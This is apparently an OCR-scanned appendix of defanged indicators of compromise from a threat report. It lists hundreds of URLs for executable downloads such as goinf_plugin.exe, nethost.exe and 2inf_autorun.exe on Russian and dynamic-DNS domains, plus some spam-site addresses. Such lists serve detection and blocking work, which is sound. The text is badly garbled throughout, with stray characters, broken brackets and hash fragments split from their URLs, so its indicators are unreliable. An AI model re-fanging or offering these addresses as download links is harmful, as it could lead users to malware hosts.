hxxp://akd[.]mamashoping[.]cloudns[.]cx/sitemap[. ]txt 

hxxp://akersfi[.]ecolinkshop[.]ru/goinf _plugin[.]lexe?etag=a8ec40f2f73a55dcfa28ca- 
ddc406088c 


hxxp://akf[. ]mamashoping[.]cloudns[.]cx/sitemap[. ]txt 
hxxp://akh[. ]mamashoping[.]cloudns[.]cx/sitemap[. ]txt 


hxxp://akhachkala[.]eco-link-shop[.]ru/etranslator _rul[.]Jexe?etag=c5bd685f93314c33dc4a0e33da- 
465b37 


hxxp://akhachkala[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=747091c146a3234c37e6a9- 
61b15bd289 


hxxp://akhachkala[.]Jeco-link-shop[.]ru/goinf _plugin[.]Jexe?etag=fb686d41a2f6810da593ff- 
38c5497ced 


hxxp://akhachkala[.]Jecolink24[.]ru/goinf _plugin[.]exe?etag=18236f828abf7919264295- 
a9ce0b6éf3e 


hxxp://akhachkala[.]Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=6137e4f2dbb6e453837b976e3- 
8e9lade 


hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf _autorun[.]exe?etag=416dd9f404d45e15bcc6é1- 
a427ffc542f 


hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf _autorun[.]exe?etag=75935343c6b0fe93e15fd- 
a29a3004faa 


hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf _autorun[.]Jexe?etag=85ab35e39f1d4502e9ee2- 
f489ebda32c 
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hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
001f817a52b 


hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
4e4ff254827 


hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
61a427ffc542f 


hxxp://akhicheva[.]eco-link-shop[.]ru/2inf 
fda29a3004faa 
hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
e2f489ebda32c 
hxxp://akhicheva[.]eco-link-shop[.]ru/2inf 
2e001f817a52b 
hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
324e4ff254827 


hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
7ffc542f 


hxxp://akhicheva[.]eco-link-shop[.]ru/2inf 
9ebda32c 
hxxp://akhicheva[.]eco-link-shop[.]ru/2inf 
ff254827 
hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
427ffc542f 
hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
29a3004faa 


hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
489ebda32c 


hxxp://akhicheva[.]eco-link-shop[.]ru/2inf 
01f817a52b 
hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
e4ff254827 
hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
5fda29a3004faa 
hxxp://akhicheva[.]eco-link-shop[.]ru/2inf 
32e001f817a52b 


_autorun[.]exe?etag=e75fcefa496873d7f732e- 
_autorun[.]exe?etag=fc902170b9e830160d332- 
_favorites[.]exe?etag=416dd9f404d45e15bcc- 
_favorites[.]exe?etag=75935343c6b0fe93e15- 
_favorites[.]Jexe?etag=85ab35e39f1d4502e9e- 
_favorites[.]exe?etag=e75fcefa496873d7f73- 
_favorites[.]exe?etag=fc902170b9e830160d3- 
_icon[.]exe?etag=416dd9f404d45e15bcc61a42- 
_icon[.]Jexe?etag=85ab35e39f1d4502e9ee2f48- 
_icon[. ]exe?etag=fc902170b9e830160d3324e4- 
_launch[.]exe?etag=416dd9f404d45e15bcc61a- 
_launch[.]exe?etag=75935343c6b0fe93e15fda- 
_launch[.]Jexe?etag=85ab35e39f1d4502e9ee2F- 
_launch[.Jexe?etag=e75fcefa496873d7f732e0- 
_launch[.]exe?etag=fc902170b9e830160d3324- 


_pinnedtabs[.]exe?etag=75935343c6b0fe93e1- 


_pinnedtabs[.]exe?etag=e75fcefa496873d/7f7- 


hxxp://akhicheva[.]eco-link-shop[.]ru/2inf shortcutmaker [.]ico 


hxxp://akhicheva[.]eco-link-shop[.]ru/2inf speaddiall[.]png 


hxxp://akhicheva[.]eco-link-shop[.]ru/2inf 
2e001f817a52b 


hxxp://akhicheva[.]eco-link-shop[.]ru/2inf 
61a427ffc542f 


hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf 
fda29a3004faa 
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_speeddial[.Jexe?etag=e75fcefa496873d7f73- 
_Startlink[.]Jexe?etag=416dd9f404d45e15bcc- 


_Sstartlink[.]exe?etag=75935343c6b0fe93e15- 


hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf _Startlink[.]exe?etag=85ab35e39f1d4502e9e- 
e2f489ebda32c 


hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf _Startlink[.]Jexe?etag=e75fcefa496873d7f73- 
2e001f817a52b 

hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf _Startlink[.]exe?etag=fc902170b9e830160d3- 
324e4ff254827 

hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf _startpage[.]exe?etag=416dd9f404d45e15bcc- 
61a427ffc542f 

hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf _startpage[.]exe?etag=75935343c6b0fe93e15- 
fda29a3004faa 

hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf _startpage[.]exe?etag=85ab35e39f1d4502e9e- 
e2f489ebda32c 

hxxp://akhicheva[.]eco-link-shop[. ]ru/2inf _startpage[.Jexe?etag=e7/5fcefa496873d7f73- 
2e001f817a52b 

hxxp://akhicheva[.]eco-link-shop[. Jru/2inf _startpage[.]exe?etag=fc902170b9e830160d3- 
324e4ff254827 


hxxp://akhicheval[.]eco-link-shop[.]ru/go_ search _desktop[.]exe?etag=416dd9f404d45e15bcc61- 
a427ffc542f 


hxxp://akhicheva[.]eco-link-shop[.]ru/go_ search _desktop[.]exe?etag=85ab35e39f1d4502e9ee2- 
f489ebda32c 


hxxp://akhicheval[.]eco-link-shop[.]ru/go_ search _desktop[.]exe?etag=fc902170b9e830160d332- 
4e4ff254827 


hxxp://akhicheval[.]eco-link-shop[.]ru/go search _taskbar[.]exe?etag=416dd9f404d45e15bcc61- 
a427ffc542f 


hxxp://akhicheva[.]eco-link-shop[.]ru/go_ search _taskbar[.]exe?etag=75935343c6b0fe93e15fd- 
a29a3004faa 


hxxp://akhicheva[.]eco-link-shop[.]ru/go search _taskbar[.]exe?etag=85ab35e39f1d4502e9ee2- 
f489ebda32c 


hxxp://akhicheval[.]eco-link-shop[.]ru/go search _taskbar[.]exe?etag=e75fcefa496873d7f732e- 
001f817a52b 


hxxp://akhicheval[.]eco-link-shop[.]ru/go search _taskbar[.]exe?etag=fc902170b9e830160d332- 
4e4ff254827 


hxxp://akhicheva[.]Jeco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=416dd9f404d45e15bcc61a427- 
ffc542f 


hxxp://akhicheva[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=75935343c6b0fe93e15fda29a- 
3004faa 


hxxp://akhicheva[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=e75fcefa496873d7f732e001f- 
817a52b 
hxxp://akhicheva[.]eco-link-shop[. ]ru/gosearch3[.]ico 
hxxp://akhicheva[.]eco-link-shop[. ]ru/nethost[.]exe?etag=416dd9f4 04d- 
45e15bcc61a427ffc542f 
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hxxp://akhicheval[.]eco-link-shop[.]ru/nethost[.]exe?etag=75935343 c6b- 
Ofe93e15fda29a3004faa 


hxxp://akhicheval[.]eco-link-shop[.]ru/nethost[.]exe?etag=85ab35e3 Of1- 
d4502e9ee2f489ebda32c 
hxxp://akhicheval[.]eco-link-shop[.]ru/nethost[.]exe?etag=e75fcefa 496- 
873d7f732e001f817a52b 
hxxp://akhicheval[.]eco-link-shop[.]ru/nethost[.]exe?etag=fc902170 b9e- 
830160d3324e4ff254827 


hxxp://akhicheva[.]eco-link-shop[.]ru/vk audio video _cis[.Jexe?etag=75935343c6b0fe93e15fda29a- 
3004faa 


hxxp://akhicheva[.]eco-link-shop[.]ru/vk audio video _cis[.]Jexe?etag=e75fcefa496873d7f732e001f- 
817a52b 


hxxp://akhicheva[.]ecolink24[.]ru/2inf _autorun[.]exe?etag=15f6c2a9db8a660816ae3- 
fdb89d90ee5 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _autorun[.]exe?etag=2c8bd1c32493465661cef- 
82ce3b327c0 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _autorun[.]exe?etag=2cf954cfad30083e347e7- 
dcc5a9a6e37 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _autorun[.]exe?etag=42cc2ccf401lef5e71f810- 
04f75a3127b 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _autorun[.]exe?etag=4bc5bb8627ff9ab92403Ff- 
167e7c62fc7 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _autorun[.]exe?etag=d3eb4cfefafc9b3f4a086- 
b24a4464562 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _favorites[.]exe?etag=15f6c2a9db8a660816a- 
e3fdb89d90ee5 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _favorites[.]exe?etag=2c8bd1c32493465661c- 
ef82ce3b327c0 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _favorites[.]exe?etag=2cf954cfad30083e347- 
e7dcc5a9a6e37 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _favorites[.]exe?etag=42cc2ccf401ef5e71f8- 
1004f75a3127b 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _favorites[.]exe?etag=4bc5bb8627ff9ab9240- 
3f167e7c62fc7 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _favorites[.]exe?etag=d3eb4cfefafc9b3f4a0- 
86b24a4464562 

hxxp://akhichevaf[.]ecolink24[.]ru/2inf _icon[.]exe?etag=15f6c2a9db8a660816ae3fdb- 
89d90ee5 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _icon[.Jexe?etag=2c8bd1c32493465661cef82c- 
e3b327c0 

hxxp://akhicheva[.]ecolink24[.]ru/2inf _icon[.Jexe?etag=2cf954cfad30083e347e7dcc- 
5a9a6e37 
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hxxp://akhicheval[.]Jecolink24[.]ru/2inf _icon[.]Jexe?etag=42cc2ccf401lef5e71f81004f75a3127b 


hxxp://akhicheva[.]ecolink24[.]ru/2inf 
e7c62fc7 


hxxp://akhicheva[.]ecolink24[. ]ru/2inf 
a4464562 


hxxp://akhicheva[.]ecolink24[.]ru/2inf 
db89d90ee5 


hxxp://akhicheva[.]ecolink24[. ]ru/2inf 
2ce3b327c0 


hxxp://akhicheva[.]ecolink24[. ]ru/2inf 
cc5a9a6e37 


hxxp://akhicheva[.]ecolink24[.]ru/2inf 
67e7c62fc7 


hxxp://akhicheval[.]ecolink24[. ]ru/2inf 
24a4464562 


hxxp://akhicheva[.]ecolink24[. ]ru/2inf 
cef82ce3b327c0 


hxxp://akhicheva[.]ecolink24[.]ru/2inf 
81004f75a3127b 


hxxp://akhicheval[.]ecolink24[. ]ru/2inf 
ef82ce3b327c0 


hxxp://akhicheva[.]ecolink24[.]ru/2inf 
1004f75a3127b 


hxxp://akhicheva[.]ecolink24[.]ru/2inf 
e3fdb89d90ee5 


hxxp://akhicheva[.]ecolink24[. ]ru/2inf 
ef82ce3b327c0 


hxxp://akhicheva[.]ecolink24[. ]ru/2inf 
e7dcc5a9a6e37 


hxxp://akhicheva[.]ecolink24[.]ru/2inf 
1004f75a3127b 


hxxp://akhicheval[.]ecolink24[. ]ru/2inf 
86b24a4464562 


hxxp://akhicheva[.]ecolink24[.]ru/2inf 
e3fdb89d90ee5 


hxxp://akhicheval[.]ecolink24[. ]ru/2inf 
ef82ce3b327c0 


hxxp://akhicheva[.]ecolink24[.]ru/2inf 
e7dcc5a9a6e37 


hxxp://akhicheva[.]ecolink24[.]ru/2inf 
1004f75a3127b 


_icon[.]exe?etag=4bc5bb862 7ff9ab92403f167- 


_icon[.Jexe?etag=d3eb4cfefafc9b3f4a086b24- 


_launch[.]Jexe?etag=15f6c2a9db8a660816ae3Ff- 


_launch[.Jexe?etag=2c8bd1c32493465661cef8- 


_launch[.Jexe?etag=2cf954cfad30083e347e7d- 


_launch[.]exe?etag=4bc5bb8627ff9ab92403f1- 


_launch[.Jexe?etag=d3eb4cfefafc9b3f4a086b- 


_pinnedtabs[.]exe?etag=2c8bd1c32493465661- 


_pinnedtabs[.]exe?etag=42cc2ccf401ef5e71f- 


_speeddiall.]exe?etag=2c8bd1c32493465661c- 


_speeddial[.Jexe?etag=42cc2ccf401ef5e71f8- 


_Startlink[.]exe?etag=15f6c2a9db8a660816a- 


_startlink[.]exe?etag=2c8bd1c32493465661c- 


_Startlink[.]exe?etag=2cf954cfad30083e347- 


_startlink[.]exe?etag=42cc2ccf401lef5e71f8- 


_startlink[.]Jexe?etag=d3eb4cfefafc9b3f4a0- 


_startpage[.]exe?etag=15f6c2a9db8a660816a- 


_startpage[.]exe?etag=2c8bd1c32493465661c- 


_startpage[.]exe?etag=2cf954cfad30083e347- 


_startpage[.Jexe?etag=42cc2ccf401ef5e71f8- 
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hxxp://akhicheva[.Jecolink24[.]ru/go _search _desktop|[.]lexe?etag=15f6c2a9db8a660816ae3- 
fdb89d90ee5 


hxxp://akhicheva[.Jecolink24[.]Jru/go search _desktop[.]exe?etag=2c8bd1c32493465661cef- 
82ce3b327c0 


hxxp://akhicheva[.Jecolink24[.]Jru/go _search _desktop[.]Jexe?etag=2cf954cfad30083e347e7- 
dcc5a9a6e37 


hxxp://akhicheva[.Jecolink24[.]ru/go _search _desktop[.]Jexe?etag=42cc2ccf401lef5e71f810- 
04f75a3127b 


hxxp://akhicheva[.Jecolink24[.]Jru/go _search _desktop[.]exe?etag=4bc5bb862 7ff9ab92403f- 
167e7c62fc7 


hxxp://akhicheva[.Jecolink24[.]ru/go search _desktop[.Jexe?etag=d3eb4cfefafc9b3f4a086- 
b24a4464562 


hxxp://akhicheva[.Jecolink24[.]Jru/go search _taskbar|[.]exe?etag=15f6c2a9db8a660816ae3- 
fdb89d90ee5 


hxxp://akhicheva[.Jecolink24[.]Jru/go _search _taskbar[.]exe?etag=2c8bd1c32493465661cef- 
82ce3b327c0 


hxxp://akhicheva[.Jecolink24[.]ru/go _search _taskbar[.]Jexe?etag=2cf954cfad30083e347e7- 
dcc5a9a6e37 


hxxp://akhicheva[.Jecolink24[.]Jru/go search _taskbar[.Jexe?etag=42cc2ccf401lef5e71f810- 
04f75a3127b 


hxxp://akhicheva[.Jecolink24[.]Jru/go search _taskbar[.]Jexe?etag=d3eb4cfefafc9b3f4a086- 
b24a4464562 


hxxp://akhicheva[.]ecolink24[.]ru/goinf plugin _cis[.Jexe?etag=2c8bd1c32493465661cef82ce- 
3b327c0 


hxxp://akhicheva[.]Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=2cf954cfad30083e347e7dcc5- 
a9a6e37 
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hxxp://nvl[.]smartwritingservice[.]4pu[.]com/article/20171130/med ical-school-admissions- 
essay/ 


hxxp://nxs[.]smartwritingservice[.]4pu[.]com/topic/1/essay/72/ 
hxxp://o-o[.]preferred[.Jatll14s11[.]v8[.]cache[.] c[.]pack[.]google[.]com/ 
hxxp://oaf[.]kladtv[.]com/ 

hxxp://occ[. ]auctions2018[.]homelinux[.]com/ 
hxxp://oda[.]auctions2018[.]homelinux[.]net/ 

hxxp://odd[. auctions2018[.]dnsalias[.]net/ 
hxxp://odf[.]goldenshopone[.]from-ca[.]com/ 
hxxp://ods[.]Jgoldenshopone|[.]from-ca[.]com/ 
hxxp://ofe[.]goldenshopone[. ]from-ca[.]com/ 


hxxp://ogjakarta[.Jecolink24[.]ru/goinf plugin _cis[.]exe?etag=b05e07c8dfbb0272acc0e0328- 
ebff86f 


hxxp://ollandia[.]Jecolinkshop[.]ru/goinf _plugin[.Jexe? 
hxxp://omandorskil. ]ecolink24[.]ru/ 


hxxp://omandorski[.]ecolink24[.]ru/goinf_ plugin _cis[.Jexe?etag=2747c5da57857ala806dd18e3- 
719ccdc 


hxxp://ombieri[.]ecolink24[.]ru/goinf _plugin[.Jexe?etag=cbeb8354481ce953f63ece- 
79cd0349da 
hxxp://ombieri[.]ecolink24[. ]ru/goinf _plugin[.lexe?etag=d3c63e6e883a8b1a6a74f7- 
dc282757fa 


hxxp://ombieri[.Jecolink24[.]Jru/goinf plugin _cis[.Jexe?etag=2c8fbcc54cd7b24ac057fc633- 
45bc3f3 


hxxp://ombieri[.Jecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=666eae32bec6a044702086e2d- 
2ae46dd 


hxxp://ombieri[.Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=dcbb018cdd501eb653e53f898- 
51dc227 


hxxp://ombieri[.Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=f2a6d0b1ee59e6db351604423- 
936330b 


hxxp://ombieri[.]ecolink24[.]ru/nethost[.]exe?etag=fbo82cab6e73652 dd93d2ccb20c987890 


hxxp://ombycilla[.]ecolink24[.]ru/goinf _plugin[.]lexe?etag=23862bfb972da223263adc- 
796acb7b7d 
hxxp://omerolo[.]Jecolink24[.]ru/goinf _plugin[.lexe?etag=47606c65093cb812b691b6- 
b32010480e 
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hxxp://ommunitaria[.]ecolink24[.]ru/goinf _plugin[.Jexe?etag=d93debe1d294c352b38115- 
f4318a91c1 


hxxp://ommunitaria[.]ecolink24[.]ru/nethost[.]Jexe?etag=f4b3456c51 d772d50- 
589a2blaf3c3ef9 

hxxp://omphrena[. Jecolink24[.]ru/goinf _plugin[.Jexe?etag=90f2d9bba4fc93d6bdc2f8- 
b1df341d6c 


hxxp://omphrena[. ]Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=51c082c64b7c820a34fda06c7- 
f018323 


hxxp://omphrena[.]Jecolinkshop[.]ru/kinoroom _browser[.]Jexe?etag=892c5485d4cd15a92f1b1- 
d4dd3e7feb3 


hxxp://onaparti[.]ecolink24[.]ru/goinf _plugin[.]lexe?etag=e6bfe4949c7c1f14d71608- 
035503c5d0 


hxxp://onaparti[.]ecolink24[.]ru/nethost[.]exe?etag=adf44ccff4705 536a0d32638ec6126a9 
hxxp://oncepcio[.]eco-link-shop[.]ru/ 
hxxp://oncepcio[.]eco-link-shop[.]ru/2inf _icon[.]Jexe?etag=b51c663c56cf178f331870c7 


hxxp://oncepcio[. ]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=ed89a54c5d57ae0461bd27- 
286625a862 


hxxp://oncepcio[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=44374e7 3fdf8f72d9545c5f24- 
19eecaf 


hxxp://oncepcio[.]ecolink24[.]ru/goinf _plugin[.]Jexe?etag=b111781c788e5af63de43b- 
312e2b6f9a 
hxxp://oncepcio[. ]ecolink24[.]ru/goinf _plugin[.]exe?etag=e75351689a6deelb3ccf2a- 
5ec4641ec5 


hxxp://oncepcio[.]Jecolink24[.]Jru/goinf plugin _cis[.]Jexe?etag=Occeb98cdead0a08e40604cfc- 
84cebd9 


hxxp://oncepcio[.]ecolink24[.]ru/goinf plugin _cis[.Jexe?etag=23c20af5bc0d7441797f28ef9- 
c84067b 


hxxp://oncepcio[.]ecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=5a28f31f33b7799c9a03d4eb9- 
584db84 


hxxp://oncepcio[.]ecolinkshop[. ]ru/goinf _plugin[.Jexe?etag=19f282a3e8d7bcbb0b4422- 
d38a2ee490 


hxxp://oncepcio[.]ecolinkshop[.]ru/kinoroom _browser[.]exe?etag=af7ef425f46cd9ff49dc1- 
0f240785f22 


hxxp://ondwana[.]eco-link-shop[. ]ru/goinf _plugin[.]exe?etag=44ad0c307c2dc2dc693438- 
07d8a92b3a 


hxxp://ondwana[. ]Jeco-link-shop[. ]ru/goinf _plugin[.]exe?etag=68e61505ee031d03ba68fd- 
3fb49128b3 


hxxp://ondwana[. ]Jeco-link-shop[. ]ru/goinf _plugin[.Jexe?etag=7105266fa7356b6b8579f5- 
e470d37462 


hxxp://ondwana[. Jeco-link-shop[. ]ru/goinf _plugin[.Jexe?etag=ba80be9769708c6569102b- 
c096a4cdd4 
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hxxp://ondwana[.]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=bd0f80ald781a0ec2455da- 
696a505c14 

hxxp://ondwana[.]eco-link-shop[.]ru/goinf plugin _cis[.]exe?etag=4e823667ef4b66c0d7896df42- 
9d55320 


hxxp://ondwana[.]eco-link-shop[.]ru/goinf plugin _cis[.]exe?etag=563b7bb21d54606c5d04451e1- 
Od5fled 


hxxp://ondwana[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=8750895f68251524fec1fc529- 
53af308 


hxxp://ondwana[.]Jeco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=941bf3fe81ffd5216908b3948- 
3066468 


hxxp://ondwana[.]Jeco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=cala54c3ee8fc84f03ca7c36e- 
a53afb3 


hxxp://ondwana[.]eco-link-shop[.]ru/kinoroom _browser[.]exe?etag=4b03bdbeedb09397cel13a- 
0d875cc0070 


hxxp://ondwanal[.]ecolink24[.]ru/goinf _plugin[.]lexe?etag=bd188957388f87dfb15ac8- 
aaa89b29e7 
hxxp://ondwanal[.]ecolink24[.]ru/goinf _plugin[.lexe?etag=ceee8ee55177f445elafbf- 
e62ad15cOf 
hxxp://ondwanal[.]ecolink24[.]ru/goinf _plugin[.lexe?etag=e8a69d9ec8447d8786a577- 
aab9d3a089 


hxxp://ondwanal[.]ecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=00378bf637de9e1c3acf51108- 
aab8976 


hxxp://ondwanaf[.]ecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=1bcf294584310079347170efe- 
d77619b 


hxxp://ondwanal[.]ecolink24[.]ru/goinf plugin _cis[.Jexe?etag=731e86267cdd083c459d995fb- 
Oadb93a 


hxxp://ondwanal[.]ecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=a8903e523e33d038895481d27- 
28266e9 


hxxp://ondwanal[.]Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=edd243251d72935f3c95c2356- 
b0f0194 


hxxp://ondwanal[.]ecolinkshop[. ]ru/goinf _plugin[.]exe?etag=1ac6742e310488bd0db992- 
4ee2efb133 

hxxp://ondwana[.]Jecolinkshop[. Jru/goinf _plugin[.]lexe?etag=210d52eae4327de927448d- 
4c156ddfbb 

hxxp://ondwanal[.]ecolinkshop[. ]ru/goinf _plugin[.Jexe?etag=54a5a86f6ca5f85e860169- 
3273722110 

hxxp://ondwanal[.]ecolinkshop[. ]ru/goinf _plugin[.]lexe?etag=899da3d097e2c2a7685645- 
dc631e54e7 

hxxp://ondwanal[.]ecolinkshop[. ]ru/goinf _plugin[.Jexe?etag=f76f80ad71f2068882be10- 
272275c527 


hxxp://ondwanal[.]ecolinkshop[.]ru/goinf_ plugin _cis[.Jexe?etag=5bf8643c1d4dcdba3abf72782- 
a87947b 
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hxxp://ondwana[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=a48d6c1513fb4f72b657a88f6- 
b5ad66b 


hxxp://ondwanal[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=a49722472ad9c59fb96d86103- 
e34fa00 


hxxp://ondwana[.]ecolinkshop[.]ru/nethost[.]exe?etag=086785de071f 67af657563- 
f5d722bf20 


hxxp://onfucia[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=130656c4557042547a88eld3a- 
32a5e2b 


hxxp://onj[.]goldenshopone[. ]from-ca[.]com/ 
hxxp://onlinelife[.]4pu[.]com/ 
hxxp://onlinelife[.]4pu[.]com/sitemap163[.]html 
hxxp://onlinelife[.]4pu[.]com/sitemap307[.]html 
hxxp://onlinens[. Jicu/ 


hxxp://onmouthshil.]eco-link-shop[.]ru/goinf_ plugin _cis[.]Jexe?etag=87f4c12b002f84052a2aae0c6- 
42a3cla 


hxxp://onnybroo[.]Jeco-link-shop[.Jru/goinf _plugin[.]Jexe?etag=33a45ba4634d543a5e9beb- 
Olccbe052f 


hxxp://onnybroo[.]eco-link-shop[.]ru/goinf plugin _cis[.]exe?etag=0989a40d0c705877a47e6ad19- 
5e89df9 


hxxp://onnybroo[.]eco-link-shop[.]ru/goinf plugin _cis[.]exe?etag=f3535e5150a14dfc989f0ce7e- 
7a29838 


hxxp://onnybroo[.]ecolink24[.]ru/goinf _plugin[.Jexe?etag=72d41dda45d2c5d6e9c265- 
4ecb8cabf4 


hxxp://onnybroo[.Jecolink24[.]ru/goinf plugin _cis[.]exe?etag=8ala88e44ae04657f0ea5002a- 
4abd678 


hxxp://onnybroo[.]ecolink24[.]ru/nethost[.]exe?etag=d94eb54a0cac¥9 23fc8a432e785dcc973 


hxxp://onnybroo[.]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=9ad2f05eef7e8c5518d4el1- 
153af2fd6éd 


hxxp://onongahelal[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=4443cdcb229f18af56307d- 
fe0ea91213 


hxxp://onongahela[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=a81181e39a46d8cb888639971. 
5486f85 


hxxp://onongahela[.Jecolinkshop[.]ru/goinf _plugin[.Jexe?etag=2bf715a0ce8413a8371b74- 
1235fa8887 


hxxp://onstantsa[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=1062bcd47b412158770074- 
0448e13f67 


hxxp://onstantsa[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=9cb6e304326295b8b90eec- 
fd20359518 


hxxp://onstantsa[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=b4688c5264ca60861155b7- 
Oba57c52fa 
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hxxp://onstantsa[.]Jeco-link-shop[.]ru/goinf _plugin[.Jexe?etag=e96e2d8921ae9be2974127- 
cd24c360c9 


hxxp://onstantsa[.]Jeco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=25f553e115adb7af9d1le2bafd- 
6lacc2f 


hxxp://onstantsa[.]eco-link-shop[.]ru/goinf plugin _cis[.]exe?etag=9f1799aafd1f84e64920802e8- 
c21b4bf 


hxxp://onstantsa[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=c74b5b1b8926b82e822fba444- 
4bc8d0e 


hxxp://onstantsa[.]eco-link-shop[.]ru/nethost[.]exe?etag=f54665ea8f 8- 
ef49da2903b70c1le08df9 

hxxp://onstantsa[.]Jecolink24[.]ru/goinf _plugin[.Jexe?etag=Odf7d6fd7c6741e92f8069- 
e0f3c569b6 

hxxp://onstantsa[.]Jecolink24[.]ru/goinf _plugin[.lexe?etag=25a034972fc4897774aa71- 
b4e1bd4f38 

hxxp://onstantsa[.]Jecolink24[.]ru/goinf _plugin[.]exe?etag=2b857617b1lae9acd557ae3- 
7e3756ea47 

hxxp://onstantsa[.]Jecolink24[.]ru/goinf _plugin[.]exe?etag=403b32f13da8a155166f5f- 
5255dee7c6 

hxxp://onstantsa[.]Jecolink24[.]ru/goinf _plugin[.lexe?etag=479cb7b8808c5f77328eda- 
0184651ed6 

hxxp://onstantsa[.]Jecolink24[.]ru/goinf _plugin[.Jexe?etag=690bb38538c10f7ca958e3- 
93d3c19c40 

hxxp://onstantsal[.]ecolink24[.]ru/goinf _plugin[.]lexe?etag=8c7bd51e4ad22b678985e3- 
3517adea86 

hxxp://onstantsa[.]Jecolink24[.]ru/goinf _plugin[.Jexe?etag=a4d737eacc64e161611e61- 
2f336fbc0a 

hxxp://onstantsal[.]ecolink24[.]ru/goinf _plugin[.]lexe?etag=b6b7644316d996a15086e6- 
809178de56 

hxxp://onstantsal[.Jecolink24[.]ru/goinf _plugin[.]exe?etag=c40bfl8e6edeb2deb9elcf- 
1198fb1978 

hxxp://onstantsal[.]ecolink24[.]ru/goinf _plugin[.Jexe?etag=f28a2b2c50cc502816b657- 
345a36b0eb 

hxxp://onstantsal[.Jecolink24[.]ru/goinf _plugin[.]exe?etag=fde6040a6ff62aefe97805- 
d9623e3bcd 


hxxp://onstantsa[.]Jecolink24[.]ru/goinf plugin cis[.Jexe?etag=20a0e2030fec89c1986f287ab- 
13fccfb 


hxxp://onstantsa[.]Jecolink24[.]ru/goinf plugin _cis[.]exe?etag=66688fe70f7c7987351e931bb- 
62d9804 


hxxp://onstantsa[.]Jecolink24[.]ru/goinf plugin _cis[.]exe?etag=bbe9742d12057af4ba838ced3- 
€944532 


hxxp://onstantsa[.]Jecolinkshop[.]ru/goinf _plugin[.]lexe?etag=0fe017d95975f8adf18a4d- 
15a7c2d4f2 
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hxxp://onstantsal[.]ecolinkshop[.]ru/goinf _plugin[.]lexe?etag=6b3a63038d8c6a7da053ab- 
e202f31775 


hxxp://onstantsal[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=7b8520af0baa77a8c056f4- 
c3d64fc74e 
hxxp://onstantsal[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=b00f513e569996a8ba9378- 
305726f730 
hxxp://onstantsal[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=d877f01342b43727d3dd86- 
35117c6f32 


hxxp://onstantsa[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=410aec29f20f23d20683c1d6c- 
7277c4f 


hxxp://onstantsa[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=87284a5118f28f9d52f4ad09e- 
5c81bc2 


hxxp://onstantsa[.]ecolinkshop[.]ru/goinf_ plugin _cis[.]Jexe?etag=aaae649aac0f281da57ceb851- 
719363f 


hxxp://onstantsa[.]ecolinkshop[.]ru/goinf_ plugin _cis[.]Jexe?etag=fb760afd0f39bc8e79154cdes- 
4eb4144 


